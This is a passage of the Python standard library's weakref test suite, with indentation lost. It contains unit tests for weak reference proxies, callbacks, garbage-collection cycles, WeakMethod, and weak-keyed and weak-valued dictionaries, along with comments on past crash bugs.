def test_basic_proxy(self):
o = C()
self.check_proxy(o, weakref.proxy(o))
L = collections.UserList()
p = weakref.proxy(L)
self.assertFalse(p, "proxy for empty UserList should be false")
p.append(12)
self.assertEqual(len(L), 1)
self.assertTrue(p, "proxy for non-empty UserList should be true")
p[:] = [2, 3]
self.assertEqual(len(L), 2)
self.assertEqual(len(p), 2)
self.assertIn(3, p, "proxy didn't support __contains__() properly")
p[1] = 5
self.assertEqual(L[1], 5)
self.assertEqual(p[1], 5)
L2 = collections.UserList(L)
p2 = weakref.proxy(L2)
self.assertEqual(p, p2)
## self.assertEqual(repr(L2), repr(p2))
L3 = collections.UserList(range(10))
p3 = weakref.proxy(L3)
self.assertEqual(L3[:], p3[:])
self.assertEqual(L3[5:], p3[5:])
self.assertEqual(L3[:5], p3[:5])
self.assertEqual(L3[2:5], p3[2:5])
# XXX(T62694321): Keep the lists alive until the end of the function.
self.assertIs(L, L)
self.assertIs(L2, L2)
def test_proxy_unicode(self):
# See bug 5037
class C(object):
def __str__(self):
return "string"
def __bytes__(self):
return b"bytes"
instance = C()
self.assertIn("__bytes__", dir(weakref.proxy(instance)))
self.assertEqual(bytes(weakref.proxy(instance)), b"bytes")
def test_proxy_index(self):
class C:
def __index__(self):
return 10
o = C()
p = weakref.proxy(o)
self.assertEqual(operator.index(p), 10)
def test_proxy_div(self):
class C:
def __floordiv__(self, other):
return 42
def __ifloordiv__(self, other):
return 21
o = C()
p = weakref.proxy(o)
self.assertEqual(p // 5, 42)
p //= 5
self.assertEqual(p, 21)
def test_proxy_matmul(self):
class C:
def __matmul__(self, other):
return 1729
def __rmatmul__(self, other):
return -163
def __imatmul__(self, other):
return 561
o = C()
p = weakref.proxy(o)
self.assertEqual(p @ 5, 1729)
self.assertEqual(5 @ p, -163)
p @= 5
self.assertEqual(p, 561)
# The PyWeakref_* C API is documented as allowing either NULL or
# None as the value for the callback, where either means "no
# callback". The "no callback" ref and proxy objects are supposed
# to be shared so long as they exist by all callers so long as
# they are active. In Python 2.3.3 and earlier, this guarantee
# was not honored, and was broken in different ways for
# PyWeakref_NewRef() and PyWeakref_NewProxy(). (Two tests.)
def test_shared_ref_without_callback(self):
self.check_shared_without_callback(weakref.ref)
def test_shared_proxy_without_callback(self):
self.check_shared_without_callback(weakref.proxy)
def check_shared_without_callback(self, makeref):
o = Object(1)
p1 = makeref(o, None)
p2 = makeref(o, None)
self.assertIs(p1, p2, "both callbacks were None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o, None)
self.assertIs(p1, p2, "callbacks were NULL, None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o)
self.assertIs(p1, p2, "both callbacks were NULL in the C API")
del p1, p2
p1 = makeref(o, None)
p2 = makeref(o)
self.assertIs(p1, p2, "callbacks were None, NULL in the C API")
def test_callable_proxy(self):
o = Callable()
ref1 = weakref.proxy(o)
self.check_proxy(o, ref1)
self.assertIs(type(ref1), weakref.CallableProxyType,
"proxy is not of callable type")
ref1('twinkies!')
self.assertEqual(o.bar, 'twinkies!',
"call through proxy not passed through to original")
ref1(x='Splat.')
self.assertEqual(o.bar, 'Splat.',
"call through proxy not passed through to original")
# expect a TypeError due to too few args
self.assertRaises(TypeError, ref1)
# expect a TypeError due to too many args
self.assertRaises(TypeError, ref1, 1, 2, 3)
def check_proxy(self, o, proxy):
o.foo = 1
self.assertEqual(proxy.foo, 1,
"proxy does not reflect attribute addition")
o.foo = 2
self.assertEqual(proxy.foo, 2,
"proxy does not reflect attribute modification")
del o.foo
self.assertFalse(hasattr(proxy, 'foo'),
"proxy does not reflect attribute removal")
proxy.foo = 1
self.assertEqual(o.foo, 1,
"object does not reflect attribute addition via proxy")
proxy.foo = 2
self.assertEqual(o.foo, 2,
"object does not reflect attribute modification via proxy")
del proxy.foo
self.assertFalse(hasattr(o, 'foo'),
"object does not reflect attribute removal via proxy")
def test_proxy_deletion(self):
# Test clearing of SF bug #762891
class Foo:
result = None
def __delitem__(self, accessor):
self.result = accessor
g = Foo()
f = weakref.proxy(g)
del f[0]
self.assertEqual(f.result, 0)
def test_proxy_bool(self):
# Test clearing of SF bug #1170766
class List(list): pass
lyst = List()
self.assertEqual(bool(weakref.proxy(lyst)), bool(lyst))
def test_proxy_iter(self):
# Test fails with a debug build of the interpreter
# (see bpo-38395).
obj = None
class MyObj:
def __iter__(self):
nonlocal obj
del obj
return NotImplemented
obj = MyObj()
p = weakref.proxy(obj)
with self.assertRaises(TypeError):
# "blech" in p calls MyObj.__iter__ through the proxy,
# without keeping a reference to the real object, so it
# can be killed in the middle of the call
"blech" in p
def test_getweakrefcount(self):
o = C()
ref1 = weakref.ref(o)
ref2 = weakref.ref(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 2,
"got wrong number of weak reference objects")
proxy1 = weakref.proxy(o)
proxy2 = weakref.proxy(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 4,
"got wrong number of weak reference objects")
del ref1, ref2, proxy1, proxy2
self.assertEqual(weakref.getweakrefcount(o), 0,
"weak reference objects not unlinked from"
" referent when discarded.")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefcount(1), 0,
"got wrong number of weak reference objects for int")
def test_getweakrefs(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref1
self.assertEqual(weakref.getweakrefs(o), [ref2],
"list of refs does not match")
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref2
self.assertEqual(weakref.getweakrefs(o), [ref1],
"list of refs does not match")
del ref1
self.assertEqual(weakref.getweakrefs(o), [],
"list of refs not cleared")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefs(1), [],
"list of refs does not match for int")
def test_newstyle_number_ops(self):
class F(float):
pass
f = F(2.0)
p = weakref.proxy(f)
self.assertEqual(p + 1.0, 3.0)
self.assertEqual(1.0 + p, 3.0) # this used to SEGV
def test_callbacks_protected(self):
# Callbacks protected from already-set exceptions?
# Regression test for SF bug #478534.
class BogusError(Exception):
pass
data = {}
def remove(k):
del data[k]
def encapsulate():
f = lambda : ()
data[weakref.ref(f, remove)] = None
raise BogusError
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
def test_sf_bug_840829(self):
# "weakref callbacks and gc corrupt memory"
# subtype_dealloc erroneously exposed a new-style instance
# already in the process of getting deallocated to gc,
# causing double-deallocation if the instance had a weakref
# callback that triggered gc.
# If the bug exists, there probably won't be an obvious symptom
# in a release build. In a debug build, a segfault will occur
# when the second attempt to remove the instance from the "list
# of all objects" occurs.
import gc
class C(object):
pass
c = C()
wr = weakref.ref(c, lambda ignore: gc.collect())
del c
# There endeth the first part. It gets worse.
del wr
c1 = C()
c1.i = C()
wr = weakref.ref(c1.i, lambda ignore: gc.collect())
c2 = C()
c2.c1 = c1
del c1 # still alive because c2 points to it
# Now when subtype_dealloc gets called on c2, it's not enough just
# that c2 is immune from gc while the weakref callbacks associated
# with c2 execute (there are none in this 2nd half of the test, btw).
# subtype_dealloc goes on to call the base classes' deallocs too,
# so any gc triggered by weakref callbacks associated with anything
# torn down by a base class dealloc can also trigger double
# deallocation of c2.
del c2
def test_callback_in_cycle_1(self):
import gc
class J(object):
pass
class II(object):
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
# Now J and II are each in a self-cycle (as all new-style class
# objects are, since their __mro__ points back to them). I holds
# both a weak reference (I.wr) and a strong reference (I.J) to class
# J. I is also in a cycle (I.wr points to a weakref that references
# I.acallback). When we del these three, they all become trash, but
# the cycles prevent any of them from getting cleaned up immediately.
# Instead they have to wait for cyclic gc to deduce that they're
# trash.
#
# gc used to call tp_clear on all of them, and the order in which
# it does that is pretty accidental. The exact order in which we
# built up these things manages to provoke gc into running tp_clear
# in just the right order (I last). Calling tp_clear on II leaves
# behind an insane class object (its __mro__ becomes NULL). Calling
# tp_clear on J breaks its self-cycle, but J doesn't get deleted
# just then because of the strong reference from I.J. Calling
# tp_clear on I starts to clear I's __dict__, and just happens to
# clear I.J first -- I.wr is still intact. That removes the last
# reference to J, which triggers the weakref callback. The callback
# tries to do "self.J", and instances of new-style classes look up
# attributes ("J") in the class dict first. The class (II) wants to
# search II.__mro__, but that's NULL. The result was a segfault in
# a release build, and an assert failure in a debug build.
del I, J, II
gc.collect()
def test_callback_in_cycle_2(self):
import gc
# This is just like test_callback_in_cycle_1, except that II is an
# old-style class. The symptom is different then: an instance of an
# old-style class looks in its own __dict__ first. 'J' happens to
# get cleared from I.__dict__ before 'wr', and 'J' was never in II's
# __dict__, so the attribute isn't found. The difference is that
# the old-style II doesn't have a NULL __mro__ (it doesn't have any
# __mro__), so no segfault occurs. Instead it got:
# test_callback_in_cycle_2 (__main__.ReferencesTestCase) ...
# Exception exceptions.AttributeError:
# "II instance has no attribute 'J'" in <bound method II.acallback
# of <?.II instance at 0x00B9B4B8>> ignored
class J(object):
pass
class II:
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
del I, J, II
gc.collect()
def test_callback_in_cycle_3(self):
import gc
# This one broke the first patch that fixed the last two. In this
# case, the objects reachable from the callback aren't also reachable
# from the object (c1) *triggering* the callback: you can get to
# c1 from c2, but not vice-versa. The result was that c2's __dict__
# got tp_clear'ed by the time the c2.cb callback got invoked.
class C:
def cb(self, ignore):
self.me
self.c1
self.wr
c1, c2 = C(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2
gc.collect()
def test_callback_in_cycle_4(self):
import gc
# Like test_callback_in_cycle_3, except c2 and c1 have different
# classes. c2's class (C) isn't reachable from c1 then, so protecting
# objects reachable from the dying object (c1) isn't enough to stop
# c2's class (C) from getting tp_clear'ed before c2.cb is invoked.
# The result was a segfault (C.__mro__ was NULL when the callback
# tried to look up self.me).
class C(object):
def cb(self, ignore):
self.me
self.c1
self.wr
class D:
pass
c1, c2 = D(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2, C, D
gc.collect()
@support.requires_type_collecting
def test_callback_in_cycle_resurrection(self):
import gc
# Do something nasty in a weakref callback: resurrect objects
# from dead cycles. For this to be attempted, the weakref and
# its callback must also be part of the cyclic trash (else the
# objects reachable via the callback couldn't be in cyclic trash
# to begin with -- the callback would act like an external root).
# But gc clears trash weakrefs with callbacks early now, which
# disables the callbacks, so the callbacks shouldn't get called
# at all (and so nothing actually gets resurrected).
alist = []
class C(object):
def __init__(self, value):
self.attribute = value
def acallback(self, ignore):
alist.append(self.c)
c1, c2 = C(1), C(2)
c1.c = c2
c2.c = c1
c1.wr = weakref.ref(c2, c1.acallback)
c2.wr = weakref.ref(c1, c2.acallback)
def C_went_away(ignore):
alist.append("C went away")
wr = weakref.ref(C, C_went_away)
del c1, c2, C # make them all trash
self.assertEqual(alist, []) # del isn't enough to reclaim anything
gc.collect()
# c1.wr and c2.wr were part of the cyclic trash, so should have
# been cleared without their callbacks executing. OTOH, the weakref
# to C is bound to a function local (wr), and wasn't trash, so that
# callback should have been invoked when C went away.
self.assertEqual(alist, ["C went away"])
# The remaining weakref should be dead now (its callback ran).
self.assertEqual(wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
def test_callbacks_on_callback(self):
import gc
# Set up weakref callbacks *on* weakref callbacks.
alist = []
def safe_callback(ignore):
alist.append("safe_callback called")
class C(object):
def cb(self, ignore):
alist.append("cb called")
c, d = C(), C()
c.other = d
d.other = c
callback = c.cb
c.wr = weakref.ref(d, callback) # this won't trigger
d.wr = weakref.ref(callback, d.cb) # ditto
external_wr = weakref.ref(callback, safe_callback) # but this will
self.assertIs(external_wr(), callback)
# The weakrefs attached to c and d should get cleared, so that
# C.cb is never called. But external_wr isn't part of the cyclic
# trash, and no cyclic trash is reachable from it, so safe_callback
# should get invoked when the bound method object callback (c.cb)
# -- which is itself a callback, and also part of the cyclic trash --
# gets reclaimed at the end of gc.
del callback, c, d, C
self.assertEqual(alist, []) # del isn't enough to clean up cycles
gc.collect()
self.assertEqual(alist, ["safe_callback called"])
self.assertEqual(external_wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
def test_gc_during_ref_creation(self):
self.check_gc_during_creation(weakref.ref)
def test_gc_during_proxy_creation(self):
self.check_gc_during_creation(weakref.proxy)
def check_gc_during_creation(self, makeref):
thresholds = gc.get_threshold()
gc.set_threshold(1, 1, 1)
gc.collect()
class A:
pass
def callback(*args):
pass
referenced = A()
a = A()
a.a = a
a.wr = makeref(referenced)
try:
# now make sure the object and the ref get labeled as
# cyclic trash:
a = A()
weakref.ref(referenced, callback)
finally:
gc.set_threshold(*thresholds)
def test_ref_created_during_del(self):
# Bug #1377858
# A weakref created in an object's __del__() would crash the
# interpreter when the weakref was cleaned up since it would refer to
# non-existent memory. This test should not segfault the interpreter.
class Target(object):
def __del__(self):
global ref_from_del
ref_from_del = weakref.ref(self)
w = Target()
def test_init(self):
# Issue 3634
# <weakref to class>.__init__() doesn't check errors correctly
r = weakref.ref(Exception)
self.assertRaises(TypeError, r.__init__, 0, 0, 0, 0, 0)
# No exception should be raised here
gc.collect()
def test_classes(self):
# Check that classes are weakrefable.
class A(object):
pass
l = []
weakref.ref(int)
a = weakref.ref(A, l.append)
A = None
gc.collect()
self.assertEqual(a(), None)
self.assertEqual(l, [a])
def test_equality(self):
# Alive weakrefs defer equality testing to their underlying object.
x = Object(1)
y = Object(1)
z = Object(2)
a = weakref.ref(x)
b = weakref.ref(y)
c = weakref.ref(z)
d = weakref.ref(x)
# Note how we directly test the operators here, to stress both
# __eq__ and __ne__.
self.assertTrue(a == b)
self.assertFalse(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertTrue(a == d)
self.assertFalse(a != d)
del x, y, z
gc.collect()
for r in a, b, c:
# Sanity check
self.assertIs(r(), None)
# Dead weakrefs compare by identity: whether `a` and `d` are the
# same weakref object is an implementation detail, since they pointed
# to the same original object and didn't have a callback.
# (see issue #16453).
self.assertFalse(a == b)
self.assertTrue(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertEqual(a == d, a is d)
self.assertEqual(a != d, a is not d)
def test_ordering(self):
# weakrefs cannot be ordered, even if the underlying objects can.
ops = [operator.lt, operator.gt, operator.le, operator.ge]
x = Object(1)
y = Object(1)
a = weakref.ref(x)
b = weakref.ref(y)
for op in ops:
self.assertRaises(TypeError, op, a, b)
# Same when dead.
del x, y
gc.collect()
for op in ops:
self.assertRaises(TypeError, op, a, b)
def test_hashing(self):
# Alive weakrefs hash the same as the underlying object
x = Object(42)
y = Object(42)
a = weakref.ref(x)
b = weakref.ref(y)
self.assertEqual(hash(a), hash(42))
del x, y
gc.collect()
# Dead weakrefs:
        # - retain their hash if they were hashed when alive;
# - otherwise, cannot be hashed.
self.assertEqual(hash(a), hash(42))
self.assertRaises(TypeError, hash, b)
def test_trashcan_16602(self):
# Issue #16602: when a weakref's target was part of a long
# deallocation chain, the trashcan mechanism could delay clearing
# of the weakref and make the target object visible from outside
# code even though its refcount had dropped to 0. A crash ensued.
class C:
def __init__(self, parent):
if not parent:
return
wself = weakref.ref(self)
def cb(wparent):
o = wself()
self.wparent = weakref.ref(parent, cb)
d = weakref.WeakKeyDictionary()
root = c = C(None)
for n in range(100):
d[c] = c = C(c)
del root
gc.collect()
def test_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
self.assertIs(ref1.__callback__, callback)
ref2 = weakref.ref(x)
self.assertIsNone(ref2.__callback__)
def test_callback_attribute_after_deletion(self):
x = Object(1)
ref = weakref.ref(x, self.callback)
self.assertIsNotNone(ref.__callback__)
del x
support.gc_collect()
self.assertIsNone(ref.__callback__)
def test_set_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
with self.assertRaises(AttributeError):
ref1.__callback__ = lambda ref: None
def test_callback_gcs(self):
class ObjectWithDel(Object):
def __del__(self): pass
x = ObjectWithDel(1)
ref1 = weakref.ref(x, lambda ref: support.gc_collect())
del x
support.gc_collect()
class SubclassableWeakrefTestCase(TestBase):
def test_subclass_refs(self):
class MyRef(weakref.ref):
def __init__(self, ob, callback=None, value=42):
self.value = value
super().__init__(ob, callback)
def __call__(self):
self.called = True
return super().__call__()
o = Object("foo")
mr = MyRef(o, value=24)
self.assertIs(mr(), o)
self.assertTrue(mr.called)
self.assertEqual(mr.value, 24)
del o
self.assertIsNone(mr())
self.assertTrue(mr.called)
def test_subclass_refs_dont_replace_standard_refs(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o)
r2 = weakref.ref(o)
self.assertIsNot(r1, r2)
self.assertEqual(weakref.getweakrefs(o), [r2, r1])
self.assertEqual(weakref.getweakrefcount(o), 2)
r3 = MyRef(o)
self.assertEqual(weakref.getweakrefcount(o), 3)
refs = weakref.getweakrefs(o)
self.assertEqual(len(refs), 3)
self.assertIs(r2, refs[0])
self.assertIn(r1, refs[1:])
self.assertIn(r3, refs[1:])
def test_subclass_refs_dont_conflate_callbacks(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o, id)
r2 = MyRef(o, str)
self.assertIsNot(r1, r2)
refs = weakref.getweakrefs(o)
self.assertIn(r1, refs)
self.assertIn(r2, refs)
def test_subclass_refs_with_slots(self):
class MyRef(weakref.ref):
__slots__ = "slot1", "slot2"
def __new__(type, ob, callback, slot1, slot2):
return weakref.ref.__new__(type, ob, callback)
def __init__(self, ob, callback, slot1, slot2):
self.slot1 = slot1
self.slot2 = slot2
def meth(self):
return self.slot1 + self.slot2
o = Object(42)
r = MyRef(o, None, "abc", "def")
self.assertEqual(r.slot1, "abc")
self.assertEqual(r.slot2, "def")
self.assertEqual(r.meth(), "abcdef")
self.assertFalse(hasattr(r, "__dict__"))
def test_subclass_refs_with_cycle(self):
"""Confirm https://bugs.python.org/issue3100 is fixed."""
# An instance of a weakref subclass can have attributes.
# If such a weakref holds the only strong reference to the object,
# deleting the weakref will delete the object. In this case,
# the callback must not be called, because the ref object is
# being deleted.
class MyRef(weakref.ref):
pass
# Use a local callback, for "regrtest -R::"
# to detect refcounting problems
def callback(w):
self.cbcalled += 1
o = C()
r1 = MyRef(o, callback)
r1.o = o
del o
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
# Same test, with two weakrefs to the same object
# (since code paths are different)
o = C()
r1 = MyRef(o, callback)
r2 = MyRef(o, callback)
r1.r = r2
r2.o = o
del o
del r2
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
class WeakMethodTestCase(unittest.TestCase):
def _subclass(self):
"""Return an Object subclass overriding `some_method`."""
class C(Object):
def some_method(self):
return 6
return C
def test_alive(self):
o = Object(1)
r = weakref.WeakMethod(o.some_method)
self.assertIsInstance(r, weakref.ReferenceType)
self.assertIsInstance(r(), type(o.some_method))
self.assertIs(r().__self__, o)
self.assertIs(r().__func__, o.some_method.__func__)
self.assertEqual(r()(), 4)
def test_object_dead(self):
o = Object(1)
r = weakref.WeakMethod(o.some_method)
del o
gc.collect()
self.assertIs(r(), None)
def test_method_dead(self):
C = self._subclass()
o = C(1)
r = weakref.WeakMethod(o.some_method)
del C.some_method
gc.collect()
self.assertIs(r(), None)
def test_callback_when_object_dead(self):
# Test callback behaviour when object dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del o
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
C.some_method = Object.some_method
gc.collect()
self.assertEqual(calls, [r])
def test_callback_when_method_dead(self):
# Test callback behaviour when method dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del C.some_method
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
del o
gc.collect()
self.assertEqual(calls, [r])
@support.cpython_only
def test_no_cycles(self):
# A WeakMethod doesn't create any reference cycle to itself.
o = Object(1)
def cb(_):
pass
r = weakref.WeakMethod(o.some_method, cb)
wr = weakref.ref(r)
del r
self.assertIs(wr(), None)
def test_equality(self):
def _eq(a, b):
self.assertTrue(a == b)
self.assertFalse(a != b)
def _ne(a, b):
self.assertTrue(a != b)
self.assertFalse(a == b)
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(x.other_method)
d = weakref.WeakMethod(y.other_method)
# Objects equal, same method
_eq(a, b)
_eq(c, d)
# Objects equal, different method
_ne(a, c)
_ne(a, d)
_ne(b, c)
_ne(b, d)
# Objects unequal, same or different method
z = Object(2)
e = weakref.WeakMethod(z.some_method)
f = weakref.WeakMethod(z.other_method)
_ne(a, e)
_ne(a, f)
_ne(b, e)
_ne(b, f)
del x, y, z
gc.collect()
# Dead WeakMethods compare by identity
refs = a, b, c, d, e, f
for q in refs:
for r in refs:
self.assertEqual(q == r, q is r)
self.assertEqual(q != r, q is not r)
def test_hashing(self):
# Alive WeakMethods are hashable if the underlying object is
# hashable.
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(y.other_method)
# Since WeakMethod objects are equal, the hashes should be equal.
self.assertEqual(hash(a), hash(b))
ha = hash(a)
# Dead WeakMethods retain their old hash value
del x, y
gc.collect()
self.assertEqual(hash(a), ha)
self.assertEqual(hash(b), ha)
# If it wasn't hashed when alive, a dead WeakMethod cannot be hashed.
self.assertRaises(TypeError, hash, c)
class MappingTestCase(TestBase):
COUNT = 10
def check_len_cycles(self, dict_type, cons):
N = 20
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
# Keep an iterator alive
it = dct.items()
try:
next(it)
except StopIteration:
pass
del items
gc.collect()
n1 = len(dct)
del it
gc.collect()
n2 = len(dct)
# one item may be kept alive inside the iterator
self.assertIn(n1, (0, 1))
self.assertEqual(n2, 0)
def test_weak_keyed_len_cycles(self):
self.check_len_cycles(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_cycles(self):
self.check_len_cycles(weakref.WeakValueDictionary, lambda k: (1, k))
def check_len_race(self, dict_type, cons):
# Extended sanity checks for len() in the face of cyclic collection
self.addCleanup(gc.set_threshold, *gc.get_threshold())
for th in range(1, 100):
N = 20
gc.collect(0)
gc.set_threshold(th, th, th)
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
del items
# All items will be collected at next garbage collection pass
it = dct.items()
try:
next(it)
except StopIteration:
pass
n1 = len(dct)
del it
n2 = len(dct)
self.assertGreaterEqual(n1, 0)
self.assertLessEqual(n1, N)
self.assertGreaterEqual(n2, 0)
self.assertLessEqual(n2, n1)
def test_weak_keyed_len_race(self):
self.check_len_race(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_race(self):
self.check_len_race(weakref.WeakValueDictionary, lambda k: (1, k))
def test_weak_values(self):
#
# This exercises d.copy(), d.items(), d[], del d[], len(d).
#
dict, objects = self.make_weak_valued_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1)
self.assertIs(o, dict[o.arg],
"wrong object returned by weak dict!")
items1 = list(dict.items())
items2 = list(dict.copy().items())
items1.sort()
items2.sort()
self.assertEqual(items1, items2,
"cloning of weak-valued dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), self.COUNT - 1,
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the values did not clear the dictionary")
# regression on SF bug #447152:
dict = weakref.WeakValueDictionary()
self.assertRaises(KeyError, dict.__getitem__, 1)
dict[2] = C()
self.assertRaises(KeyError, dict.__getitem__, 2)
def test_weak_keys(self):
#
# This exercises d.copy(), d.items(), d[] = v, d[], del d[],
# len(d), k in d.
#
dict, objects = self.make_weak_keyed_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong number of weak references to %r!" % o)
self.assertIs(o.arg, dict[o],
"wrong object returned by weak dict!")
items1 = dict.items()
items2 = dict.copy().items()
self.assertEqual(set(items1), set(items2),
"cloning of weak-keyed dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), (self.COUNT - 1),
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the keys did not clear the dictionary")
o = Object(42)
dict[o] = "What is the meaning of the universe?"
self.assertIn(o, dict)
self.assertNotIn(34, dict)
def test_weak_keyed_iters(self):
dict, objects = self.make_weak_keyed_dict()
self.check_iters(dict)
# Test keyrefs()
refs = dict.keyrefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test iterkeyrefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.keyrefs())), len(objects))
for wr in dict.keyrefs():
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def test_weak_valued_iters(self):
dict, objects = self.make_weak_valued_dict()
self.check_iters(dict)
# Test valuerefs()
refs = dict.valuerefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test itervaluerefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.itervaluerefs())), len(objects))
for wr in dict.itervaluerefs():
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def check_iters(self, dict):
# item iterator:
items = list(dict.items())
for item in dict.items():
items.remove(item)
self.assertFalse(items, "items() did not touch all items")
# key iterator, via __iter__():
keys = list(dict.keys())
for k in dict:
keys.remove(k)
self.assertFalse(keys, "__iter__() did not touch all keys")
# key iterator, via iterkeys():
keys = list(dict.keys())
for k in dict.keys():
keys.remove(k)
self.assertFalse(keys, "iterkeys() did not touch all keys")
# value iterator:
values = list(dict.values())
for v in dict.values():
values.remove(v)
self.assertFalse(values,
"itervalues() did not touch all values")
def check_weak_destroy_while_iterating(self, dict, objects, iter_name):
n = len(dict)
it = iter(getattr(dict, iter_name)())
next(it) # Trigger internal iteration
# Destroy an object
del objects[-1]
gc.collect() # just in case
# We have removed either the first consumed object, or another one
self.assertIn(len(list(it)), [len(objects), len(objects) - 1])
del it
# The removal has been committed
self.assertEqual(len(dict), n - 1)
def check_weak_destroy_and_mutate_while_iterating(self, dict, testcontext):
# Check that we can explicitly mutate the weak dict without
# interfering with delayed removal.
# `testcontext` should create an iterator, destroy one of the
# weakref'ed objects and then return a new key/value pair corresponding
# to the destroyed object.
with testcontext() as (k, v):
self.assertNotIn(k, dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.__delitem__, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.pop, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
dict[k] = v
self.assertEqual(dict[k], v)
ddict = copy.copy(dict)
with testcontext() as (k, v):
dict.update(ddict)
self.assertEqual(dict, ddict)
with testcontext() as (k, v):
dict.clear()
self.assertEqual(len(dict), 0)
def check_weak_del_and_len_while_iterating(self, dict, testcontext):
# Check that len() works when both iterating and removing keys
# explicitly through various means (.pop(), .clear()...), while
# implicit mutation is deferred because an iterator is alive.
# (each call to testcontext() should schedule one item for removal
# for this test to work properly)
o = Object(123456)
with testcontext():
n = len(dict)
            # Since the underlying dict is ordered, the first item is popped
dict.pop(next(dict.keys()))
self.assertEqual(len(dict), n - 1)
dict[o] = o
self.assertEqual(len(dict), n)
# last item in objects is removed from dict in context shutdown
with testcontext():
self.assertEqual(len(dict), n - 1)
# Then, (o, o) is popped
dict.popitem()
self.assertEqual(len(dict), n - 2)
with testcontext():
self.assertEqual(len(dict), n - 3)
del dict[next(dict.keys())]
self.assertEqual(len(dict), n - 4)
with testcontext():
self.assertEqual(len(dict), n - 5)
dict.popitem()
self.assertEqual(len(dict), n - 6)
with testcontext():
dict.clear()
self.assertEqual(len(dict), 0)
self.assertEqual(len(dict), 0)
def test_weak_keys_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_keyed_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'keyrefs')
dict, objects = self.make_weak_keyed_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
v = objects.pop().arg
gc.collect() # just in case
yield Object(v), v
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
# Issue #21173: len() fragile when keys are both implicitly and
# explicitly removed.
dict, objects = self.make_weak_keyed_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
def test_weak_values_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_valued_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
